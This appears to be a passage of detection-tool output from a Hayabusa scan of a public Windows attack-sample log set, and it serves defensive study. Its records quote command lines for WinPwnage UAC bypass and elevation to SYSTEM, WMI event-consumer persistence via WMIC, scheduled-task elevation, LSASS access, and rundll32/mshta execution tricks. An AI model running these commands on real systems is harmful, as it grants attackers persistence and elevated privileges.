Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-11 17:28:22.598 +00:00,IEWIN7,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation_sysmon/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-11 17:57:49.903 +00:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -5 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x14591 | PID: 3140 | PGUID: 365ABB72-0D1D-5CD7-0000-001020EF1500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:22.809 +00:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x14591 | PID: 1832 | PGUID: 365ABB72-0D3E-5CD7-0000-0010680E1600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:23.215 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer CREATE Name=""BotConsumer23"", ExecutablePath=""c:\Windows\System32\cmd.exe"", CommandLineTemplate=""c:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 3184 | PGUID: 365ABB72-0D3F-5CD7-0000-0010DB251600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:23.340 +00:00,IEWIN7,20,info,,WMI Event Consumer Activity,"Created | Type: Command Line | Name: ""BotConsumer23"" | Dst: ""c:\\Windows\\System32\\cmd.exe"" | User: IEWIN7\IEUser",rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:23.418 +00:00,IEWIN7,21,info,,WMI Event Consumer To Filter Activity,"Created | Consumer: ""CommandLineEventConsumer.Name=\""BotConsumer23\"""" | Filter: ""__EventFilter.Name=\""BotFilter82\""""",rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:23.450 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name=""BotFilter82""', Consumer='CommandLineEventConsumer.Name=""BotConsumer23""' | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 3196 | PGUID: 365ABB72-0D3F-5CD7-0000-00108B381600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:23.590 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter CREATE Name=""BotFilter82"", EventNameSpace=""root\cimv2"", QueryLanguage=""WQL"", Query=""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 1616 | PGUID: 365ABB72-0D3F-5CD7-0000-001089471600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:39.746 +00:00,IEWIN7,19,info,,WMI Event Filter Activity,"Created | Namespace: ""root\\cimv2"" | Name: ""BotFilter82"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" | User: IEWIN7\IEUser",rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:50.090 +00:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -Embedding | LID: 0x3e7 | PID: 2544 | PGUID: 365ABB72-0D5A-5CD7-0000-001069031700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:54.762 +00:00,IEWIN7,10,low,,Process Access,Src Process: c:\python27\python.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 1832 | Src PGUID: 365ABB72-0D3E-5CD7-0000-0010680E1600 | Tgt PID: 444 | Tgt PGUID: 365ABB72-8693-5CD7-0000-0010F4570000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:54.762 +00:00,IEWIN7,10,low,,Process Access,Src Process: c:\python27\python.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 1832 | Src PGUID: 365ABB72-0D3E-5CD7-0000-0010680E1600 | Tgt PID: 492 | Tgt PGUID: 365ABB72-8693-5CD7-0000-0010765E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:54.762 +00:00,IEWIN7,10,medium,CredAccess,Rare GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/proc_access_win_rare_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:54.762 +00:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/proc_access_win_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:54.887 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer WHERE Name=""BotConsumer23"" DELETE | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 2432 | PGUID: 365ABB72-0D5E-5CD7-0000-0010A1141700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:54.903 +00:00,IEWIN7,20,info,,WMI Event Consumer Activity,"Deleted | Type: Command Line | Name: ""BotConsumer23"" | Dst: ""c:\\Windows\\System32\\cmd.exe"" | User: IEWIN7\IEUser",rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:54.981 +00:00,IEWIN7,19,info,,WMI Event Filter Activity,"Deleted | Namespace: ""root\\cimv2"" | Name: ""BotFilter82"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" | User: IEWIN7\IEUser",rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:55.028 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter WHERE Name=""BotFilter82"" DELETE | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 4084 | PGUID: 365ABB72-0D5E-5CD7-0000-0010E6241700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:55.090 +00:00,IEWIN7,21,info,,WMI Event Consumer To Filter Activity,"Deleted | Consumer: ""CommandLineEventConsumer.Name=\""BotConsumer23\"""" | Filter: ""__EventFilter.Name=\""BotFilter82\""""",rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:55.153 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=""BotFilter82""' DELETE | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 3016 | PGUID: 365ABB72-0D5E-5CD7-0000-001047331700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 18:10:42.434 +00:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -i 1 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x14591 | PID: 744 | PGUID: 365ABB72-1022-5CD7-0000-00105D081C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-11 18:10:42.637 +00:00,IEWIN7,10,low,,Process Access,Src Process: c:\python27\python.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x101ffb | Src PID: 744 | Src PGUID: 365ABB72-1022-5CD7-0000-00105D081C00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-8693-5CD7-0000-0010765E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-11 18:10:42.668 +00:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\lsass.exe | LID: 0x3e7 | PID: 3248 | PGUID: 365ABB72-1022-5CD7-0000-0010DF121C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-11 18:10:42.668 +00:00,IEWIN7,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation_sysmon/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-12 00:32:24.461 +00:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x1384a | PID: 2740 | PGUID: 365ABB72-6998-5CD7-0000-00104E422200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 00:32:30.211 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | LID: 0x1384a | PID: 3876 | PGUID: 365ABB72-699E-5CD7-0000-001073582200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 00:32:30.211 +00:00,IEWIN7,1,high,Exec,Suspicius Schtasks From Env Var Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_schtasks_env_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 00:32:30.211 +00:00,IEWIN7,1,high,Exec,Suspicious Add Scheduled Task From User AppData Temp,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 00:32:30.211 +00:00,IEWIN7,1,high,Exec,Suspicious Add Scheduled Command Pattern,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_schtasks_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 00:32:30.211 +00:00,IEWIN7,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 00:32:30.227 +00:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\elevator | Process: C:\Windows\system32\svchost.exe | PID: 972 | PGUID: 365ABB72-5DEA-5CD7-0000-001077D20000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 00:32:35.258 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /run /tn elevator | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | LID: 0x1384a | PID: 3752 | PGUID: 365ABB72-69A3-5CD7-0000-0010306F2200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 00:32:35.352 +00:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: taskeng.exe {9C7BC894-6658-423B-9B58-61636DBB1451} S-1-5-18:NT AUTHORITY\System:Service: | LID: 0x3e7 | PID: 1860 | PGUID: 365ABB72-69A3-5CD7-0000-00109D7F2200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 00:32:40.342 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /delete /tn elevator | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | LID: 0x1384a | PID: 3792 | PGUID: 365ABB72-69A8-5CD7-0000-0010C0982200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 12:52:43.702 +00:00,IEWIN7,7045,info,Persis,Service Installed,Name: WinPwnage | Path: %COMSPEC% /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\.\pipe\WinPwnagePipe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/System_7045_namedpipe_privesc.evtx +2019-05-12 13:30:32.931 +00:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x13a10 | PID: 1332 | PGUID: 365ABB72-1FF8-5CD8-0000-00102A342000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:30:46.181 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\ieframe.url | Process: c:\python27\python.exe | PID: 1332 | PGUID: 365ABB72-1FF8-5CD8-0000-00102A342000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:30:46.400 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe | LID: 0x13a10 | PID: 2960 | PGUID: 365ABB72-2006-5CD8-0000-0010A2862300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:30:46.400 +00:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:30:46.556 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url | LID: 0x13a10 | PID: 2936 | PGUID: 365ABB72-2006-5CD8-0000-0010E0912300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:32:58.167 +00:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 3560 | PGUID: 365ABB72-208A-5CD8-0000-0010119B2400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:32:58.167 +00:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:33:37.078 +00:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,FileProtocolHandler calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 1844 | PGUID: 365ABB72-20B1-5CD8-0000-001064D62400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:33:37.078 +00:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:33:59.743 +00:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 1416 | PGUID: 365ABB72-20C7-5CD8-0000-001021022500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:33:59.743 +00:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:37:49.604 +00:00,IEWIN7,11,info,,File Created,Path: C:\ProgramData\calc.hta | Process: C:\Windows\Explorer.EXE | PID: 2940 | PGUID: 365ABB72-15B9-5CD8-0000-00103CEB0600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:38:00.523 +00:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 3856 | PGUID: 365ABB72-21B8-5CD8-0000-0010BADE2600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:38:00.523 +00:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:38:00.712 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta | LID: 0x13a10 | PID: 2964 | PGUID: 365ABB72-21B8-5CD8-0000-0010E4E82600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:38:00.712 +00:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:38:00.712 +00:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:38:00.712 +00:00,IEWIN7,1,high,Exec | Evas,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation_sysmon/proc_creation_win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:38:01.383 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" | LID: 0x13a10 | PID: 704 | PGUID: 365ABB72-21B9-5CD8-0000-0010FC002700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:55:56.626 +00:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1364c | PID: 684 | PGUID: 365ABB72-25EC-5CD8-0000-0010CB0A1000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 13:56:12.329 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\shdocvw.url | Process: c:\python27\python.exe | PID: 684 | PGUID: 365ABB72-25EC-5CD8-0000-0010CB0A1000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 13:56:12.652 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe | LID: 0x1364c | PID: 2168 | PGUID: 365ABB72-25FC-5CD8-0000-0010906A1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 13:56:12.652 +00:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 13:56:46.573 +00:00,IEWIN7,11,info,,File Created,Path: C:\Windows\inf\WmiApRpl\0009\WmiApRpl.ini | Process: \\?\C:\Windows\system32\wbem\WMIADAP.EXE | PID: 1512 | PGUID: 